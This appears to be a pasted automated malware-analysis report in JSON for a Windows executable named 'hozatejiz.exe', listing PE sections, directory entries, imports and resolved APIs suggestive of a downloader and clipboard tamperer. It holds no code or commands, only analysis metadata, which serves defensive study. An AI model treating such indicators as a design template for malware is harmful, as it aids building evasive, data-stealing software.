- {
- "name": ".rdata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00026000",
- "size_of_data": "0x00009000",
- "entropy": "4.71",
- "raw_address": "0x00025400",
- "virtual_size": "0x00008ee0",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".data",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0002f000",
- "size_of_data": "0x00001a00",
- "entropy": "3.42",
- "raw_address": "0x0002e400",
- "virtual_size": "0x04e5d9ec",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x04e8d000",
- "size_of_data": "0x00009a00",
- "entropy": "6.00",
- "raw_address": "0x0002fe00",
- "virtual_size": "0x0000998c",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".yum",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x04e97000",
- "size_of_data": "0x00000400",
- "entropy": "0.00",
- "raw_address": "0x00039800",
- "virtual_size": "0x00001200",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".rsrc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x04e99000",
- "size_of_data": "0x00002200",
- "entropy": "4.72",
- "raw_address": "0x00039c00",
- "virtual_size": "0x00002148",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".reloc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x04e9c000",
- "size_of_data": "0x00002000",
- "entropy": "6.62",
- "raw_address": "0x0003be00",
- "virtual_size": "0x00001fcc",
- "characteristics_raw": "0x42000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x0002e630",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x0000004d"
- },
- {
- "virtual_address": "0x0002e680",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x00000028"
- },
- {
- "virtual_address": "0x04e99000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x00002148"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x04e9c000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x00001fcc"
- },
- {
- "virtual_address": "0x000261d0",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x00000038"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00026000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x00000174"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [
- {
- "ordinal": 1,
- "name": "MyFunc165@@4",
- "address": "0x425db0"
- }
- ],
- "guest_signers": {},
- "imphash": "e4ef01da1d05a7641f1f800f164dcec2",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": "C:\\xaserohakapebeh-jeron74_nonokacideyebiwac71_s.pdb\\x00\\bin\\hozatejiz.pdb\\x00\\x00\\x00\\x00\\x00\\x9d\\x00\\x00\\x00\\x9d",
- "imported_dll_count": 1,
- "versioninfo": []
- }
- }
- [*] Resolved APIs: [
- "kernel32.dll.FlsAlloc",
- "kernel32.dll.FlsFree",
- "kernel32.dll.FlsGetValue",
- "kernel32.dll.FlsSetValue",
- "kernel32.dll.InitializeCriticalSectionEx",
- "kernel32.dll.CreateEventExW",
- "kernel32.dll.CreateSemaphoreExW",
- "kernel32.dll.SetThreadStackGuarantee",
- "kernel32.dll.CreateThreadpoolTimer",
- "kernel32.dll.SetThreadpoolTimer",
- "kernel32.dll.WaitForThreadpoolTimerCallbacks",
- "kernel32.dll.CloseThreadpoolTimer",
- "kernel32.dll.CreateThreadpoolWait",
- "kernel32.dll.SetThreadpoolWait",
- "kernel32.dll.CloseThreadpoolWait",
- "kernel32.dll.FlushProcessWriteBuffers",
- "kernel32.dll.FreeLibraryWhenCallbackReturns",
- "kernel32.dll.GetCurrentProcessorNumber",
- "kernel32.dll.GetLogicalProcessorInformation",
- "kernel32.dll.CreateSymbolicLinkW",
- "kernel32.dll.EnumSystemLocalesEx",
- "kernel32.dll.CompareStringEx",
- "kernel32.dll.GetDateFormatEx",
- "kernel32.dll.GetLocaleInfoEx",
- "kernel32.dll.GetTimeFormatEx",
- "kernel32.dll.GetUserDefaultLocaleName",
- "kernel32.dll.IsValidLocaleName",
- "kernel32.dll.LCMapStringEx",
- "kernel32.dll.GetTickCount64",
- "kernel32.dll.LoadLibraryA",
- "kernel32.dll.VirtualAlloc",
- "kernel32.dll.VirtualProtect",
- "kernel32.dll.VirtualFree",
- "kernel32.dll.GetVersionExA",
- "kernel32.dll.TerminateProcess",
- "kernel32.dll.ExitProcess",
- "kernel32.dll.SetErrorMode",
- "msvcrt.dll._controlfp",
- "msvcrt.dll._except_handler3",
- "msvcrt.dll.__set_app_type",
- "msvcrt.dll.__p__fmode",
- "msvcrt.dll.isalpha",
- "msvcrt.dll.__p__commode",
- "msvcrt.dll._adjust_fdiv",
- "msvcrt.dll.__setusermatherr",
- "msvcrt.dll._initterm",
- "msvcrt.dll.__getmainargs",
- "msvcrt.dll._acmdln",
- "msvcrt.dll.exit",
- "msvcrt.dll._XcptFilter",
- "msvcrt.dll._exit",
- "msvcrt.dll._snprintf",
- "msvcrt.dll.fclose",
- "msvcrt.dll.fseek",
- "msvcrt.dll.ftell",
- "msvcrt.dll.wcsstr",
- "msvcrt.dll._wfopen",
- "msvcrt.dll.srand",
- "msvcrt.dll.rand",
- "msvcrt.dll._snwprintf",
- "msvcrt.dll.isdigit",
- "msvcrt.dll.memset",
- "msvcrt.dll.memcpy",
- "wininet.dll.InternetOpenUrlA",
- "wininet.dll.HttpQueryInfoA",
- "wininet.dll.InternetCloseHandle",
- "wininet.dll.InternetReadFile",
- "wininet.dll.InternetOpenUrlW",
- "wininet.dll.InternetOpenW",
- "wininet.dll.InternetOpenA",
- "urlmon.dll.URLDownloadToFileW",
- "shlwapi.dll.PathFileExistsW",
- "shlwapi.dll.PathFindFileNameA",
- "shlwapi.dll.PathFindFileNameW",
- "kernel32.dll.GetModuleFileNameW",
- "kernel32.dll.GetFileAttributesW",
- "kernel32.dll.CopyFileW",
- "kernel32.dll.CreateDirectoryW",
- "kernel32.dll.GetLogicalDriveStringsW",
- "kernel32.dll.GetDriveTypeW",
- "kernel32.dll.FindFirstFileW",
- "kernel32.dll.ExpandEnvironmentStringsW",
- "kernel32.dll.DeleteFileW",
- "kernel32.dll.CloseHandle",
- "kernel32.dll.FindClose",
- "kernel32.dll.WriteFile",
- "kernel32.dll.GetTickCount",
- "kernel32.dll.GlobalUnlock",
- "kernel32.dll.Sleep",
- "kernel32.dll.GlobalAlloc",
- "kernel32.dll.GlobalLock",
- "kernel32.dll.IsDebuggerPresent",
- "kernel32.dll.GetModuleHandleA",
- "kernel32.dll.Process32First",
- "kernel32.dll.Process32Next",
- "kernel32.dll.FindNextFileW",
- "kernel32.dll.SetFileAttributesW",
- "kernel32.dll.GetVolumeInformationW",
- "kernel32.dll.CreateFileW",
- "kernel32.dll.ExitThread",
- "kernel32.dll.GetStartupInfoA",
- "kernel32.dll.CreateThread",
- "kernel32.dll.CreateMutexA",
- "kernel32.dll.GetLastError",
- "kernel32.dll.CreateToolhelp32Snapshot",
- "kernel32.dll.CreateProcessW",
- "user32.dll.SetClipboardData",
- "user32.dll.OpenClipboard",
- "user32.dll.EmptyClipboard",
- "user32.dll.GetClipboardData",
- "user32.dll.CloseClipboard",
- "user32.dll.CharUpperA",
- "advapi32.dll.RegCreateKeyExA",
- "advapi32.dll.RegCloseKey",
- "advapi32.dll.RegSetValueExW",
- "advapi32.dll.RegOpenKeyExW",
- "shell32.dll.ShellExecuteW",
- "ole32.dll.CoInitialize",
- "ole32.dll.CoCreateInstance",
- "msvcr100.dll.atexit",
- "rasapi32.dll.RasConnectionNotificationW",
- "sechost.dll.NotifyServiceStatusChangeA",
- "cryptbase.dll.SystemFunction036"
- ]
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "ExitProcess",
- "address": "0x426000"
- },
- {
- "name": "DebugActiveProcessStop",
- "address": "0x426004"
- },
- {
- "name": "lstrcpynA",
- "address": "0x426008"
- },
- {
- "name": "UnlockFile",
- "address": "0x42600c"
- },
- {
- "name": "GetFileAttributesExA",
- "address": "0x426010"
- },
- {
- "name": "GetTickCount",
- "address": "0x426014"
- },
- {
- "name": "GetNumberFormatA",
- "address": "0x426018"
- },
- {
- "name": "GlobalAlloc",
- "address": "0x42601c"
- },
- {
- "name": "LoadLibraryW",
- "address": "0x426020"
- },
- {
- "name": "GetConsoleAliasExesLengthW",
- "address": "0x426024"
- },
- {
- "name": "GetBinaryTypeA",
- "address": "0x426028"
- },
- {
- "name": "lstrlenW",
- "address": "0x42602c"
- },
- {
- "name": "Module32First",
- "address": "0x426030"
- },
- {
- "name": "GetLastError",
- "address": "0x426034"
- },
- {
- "name": "GetProcAddress",
- "address": "0x426038"
- },
- {
- "name": "PeekConsoleInputW",
- "address": "0x42603c"
- },
- {
- "name": "WTSGetActiveConsoleSessionId",
- "address": "0x426040"
- },
- {
- "name": "VirtualProtect",
- "address": "0x426044"
- },
- {
- "name": "CreateToolhelp32Snapshot",
- "address": "0x426048"
- },
- {
- "name": "GetCPInfoExA",
- "address": "0x42604c"
- },
- {
- "name": "CloseHandle",
- "address": "0x426050"
- },
- {
- "name": "EncodePointer",
- "address": "0x426054"
- },
- {
- "name": "DecodePointer",
- "address": "0x426058"
- },
- {
- "name": "GetCommandLineA",
- "address": "0x42605c"
- },
- {
- "name": "RaiseException",
- "address": "0x426060"
- },
- {
- "name": "RtlUnwind",
- "address": "0x426064"
- },
- {
- "name": "IsDebuggerPresent",
- "address": "0x426068"
- },
- {
- "name": "IsProcessorFeaturePresent",
- "address": "0x42606c"
- },
- {
- "name": "EnterCriticalSection",
- "address": "0x426070"
- },
- {
- "name": "LeaveCriticalSection",
- "address": "0x426074"
- },
- {
- "name": "FlushFileBuffers",
- "address": "0x426078"
- },
- {
- "name": "WriteFile",
- "address": "0x42607c"
- },
- {
- "name": "WideCharToMultiByte",
- "address": "0x426080"
- },
- {
- "name": "GetConsoleCP",
- "address": "0x426084"
- },
- {
- "name": "GetConsoleMode",
- "address": "0x426088"
- },
- {
- "name": "DeleteCriticalSection",
- "address": "0x42608c"
- },
- {
- "name": "FatalAppExitA",
- "address": "0x426090"
- },
- {
- "name": "GetModuleHandleExW",
- "address": "0x426094"
- },
- {
- "name": "AreFileApisANSI",
- "address": "0x426098"
- },
- {
- "name": "MultiByteToWideChar",
- "address": "0x42609c"
- },
- {
- "name": "HeapSize",
- "address": "0x4260a0"
- },
- {
- "name": "HeapFree",
- "address": "0x4260a4"
- },
- {
- "name": "HeapAlloc",
- "address": "0x4260a8"
- },
- {
- "name": "SetLastError",
- "address": "0x4260ac"
- },
- {
- "name": "GetCurrentThread",
- "address": "0x4260b0"
- },
- {
- "name": "GetCurrentThreadId",
- "address": "0x4260b4"
- },
- {
- "name": "GetProcessHeap",
- "address": "0x4260b8"
- },
- {
- "name": "GetStdHandle",
- "address": "0x4260bc"
- },
- {
- "name": "GetFileType",
- "address": "0x4260c0"
- },
- {
- "name": "GetStartupInfoW",
- "address": "0x4260c4"
- },
- {
- "name": "GetModuleFileNameA",
- "address": "0x4260c8"
- },
- {
- "name": "GetModuleFileNameW",
- "address": "0x4260cc"
- },
- {
- "name": "QueryPerformanceCounter",
- "address": "0x4260d0"
- },
- {
- "name": "GetCurrentProcessId",
- "address": "0x4260d4"
- },
- {
- "name": "GetSystemTimeAsFileTime",
- "address": "0x4260d8"
- },
- {
- "name": "GetEnvironmentStringsW",
- "address": "0x4260dc"
- },
- {
- "name": "FreeEnvironmentStringsW",
- "address": "0x4260e0"
- },
- {
- "name": "UnhandledExceptionFilter",
- "address": "0x4260e4"
- },
- {
- "name": "SetUnhandledExceptionFilter",
- "address": "0x4260e8"
- },
- {
- "name": "InitializeCriticalSectionAndSpinCount",
- "address": "0x4260ec"
- },
- {
- "name": "CreateEventW",
- "address": "0x4260f0"
- },
- {
- "name": "Sleep",
- "address": "0x4260f4"
- },
- {
- "name": "GetCurrentProcess",
- "address": "0x4260f8"
- },
- {
- "name": "TerminateProcess",
- "address": "0x4260fc"
- },
- {
- "name": "TlsAlloc",
- "address": "0x426100"
- },
- {
- "name": "TlsGetValue",
- "address": "0x426104"
- },
- {
- "name": "TlsSetValue",
- "address": "0x426108"
- },
- {
- "name": "TlsFree",
- "address": "0x42610c"
- },
- {
- "name": "GetModuleHandleW",
- "address": "0x426110"
- },
- {
- "name": "CreateSemaphoreW",
- "address": "0x426114"
- },
- {
- "name": "SetStdHandle",
- "address": "0x426118"
- },
- {
- "name": "SetFilePointerEx",
- "address": "0x42611c"
- },
- {
- "name": "WriteConsoleW",
- "address": "0x426120"
- },
- {
- "name": "SetConsoleCtrlHandler",
- "address": "0x426124"
- },
- {
- "name": "FreeLibrary",
- "address": "0x426128"
- },
- {
- "name": "LoadLibraryExW",
- "address": "0x42612c"
- },
- {
- "name": "IsValidCodePage",
- "address": "0x426130"
- },
- {
- "name": "GetACP",
- "address": "0x426134"
- },
- {
- "name": "GetOEMCP",
- "address": "0x426138"
- },
- {
- "name": "GetCPInfo",
- "address": "0x42613c"
- },
- {
- "name": "HeapReAlloc",
- "address": "0x426140"
- },
- {
- "name": "GetDateFormatW",
- "address": "0x426144"
- },
- {
- "name": "GetTimeFormatW",
- "address": "0x426148"
- },
- {
- "name": "CompareStringW",
- "address": "0x42614c"
- },
- {
- "name": "LCMapStringW",
- "address": "0x426150"
- },
- {
- "name": "GetLocaleInfoW",
- "address": "0x426154"
- },
- {
- "name": "IsValidLocale",
- "address": "0x426158"
- },
- {
- "name": "GetUserDefaultLCID",
- "address": "0x42615c"
- },
- {
- "name": "EnumSystemLocalesW",
- "address": "0x426160"
- },
- {
- "name": "OutputDebugStringW",
- "address": "0x426164"
- },
- {
- "name": "GetStringTypeW",
- "address": "0x426168"
- },
- {
- "name": "CreateFileW",
- "address": "0x42616c"
- }
- ],
- "dll": "KERNEL32.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": "hozatejiz.exe",
- "actual_checksum": "0x00044ae0",
- "overlay": null,
- "imagebase": "0x00400000",
- "reported_checksum": "0x00044ae0",
- "icon_hash": null,
- "entrypoint": "0x00403a61",
- "timestamp": "2018-06-17 04:22:09",
- "osversion": "5.1",
- "sections": [
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00001000",
- "size_of_data": "0x00025000",
- "entropy": "6.72",
- "raw_address": "0x00000400",
- "virtual_size": "0x00024ebd",
- "characteristics_raw": "0x60000020"
- },
- {
- "name": ".rdata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00026000",
- "size_of_data": "0x00009000",
- "entropy": "4.71",
- "raw_address": "0x00025400",
- "virtual_size": "0x00008ee0",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".data",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0002f000",
- "size_of_data": "0x00001a00",
- "entropy": "3.42",
- "raw_address": "0x0002e400",
- "virtual_size": "0x04e5d9ec",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x04e8d000",
- "size_of_data": "0x00009a00",
- "entropy": "6.00",
- "raw_address": "0x0002fe00",
- "virtual_size": "0x0000998c",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".yum",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x04e97000",
- "size_of_data": "0x00000400",
- "entropy": "0.00",
- "raw_address": "0x00039800",
- "virtual_size": "0x00001200",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".rsrc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x04e99000",
- "size_of_data": "0x00002200",
- "entropy": "4.72",
- "raw_address": "0x00039c00",
- "virtual_size": "0x00002148",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".reloc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x04e9c000",
- "size_of_data": "0x00002000",
- "entropy": "6.62",
- "raw_address": "0x0003be00",
- "virtual_size": "0x00001fcc",
- "characteristics_raw": "0x42000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x0002e630",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x0000004d"
- },
- {
- "virtual_address": "0x0002e680",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x00000028"
- },
- {
- "virtual_address": "0x04e99000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x00002148"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x04e9c000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x00001fcc"
- },
- {
- "virtual_address": "0x000261d0",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x00000038"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00026000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x00000174"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [
- {
- "ordinal": 1,
- "name": "MyFunc165@@4",
- "address": "0x425db0"
- }
- ],
- "guest_signers": {},
- "imphash": "e4ef01da1d05a7641f1f800f164dcec2",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": "C:\\xaserohakapebeh-jeron74_nonokacideyebiwac71_s.pdb\\x00\\bin\\hozatejiz.pdb\\x00\\x00\\x00\\x00\\x00\\x9d\\x00\\x00\\x00\\x9d",
- "imported_dll_count": 1,
- "versioninfo": []
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement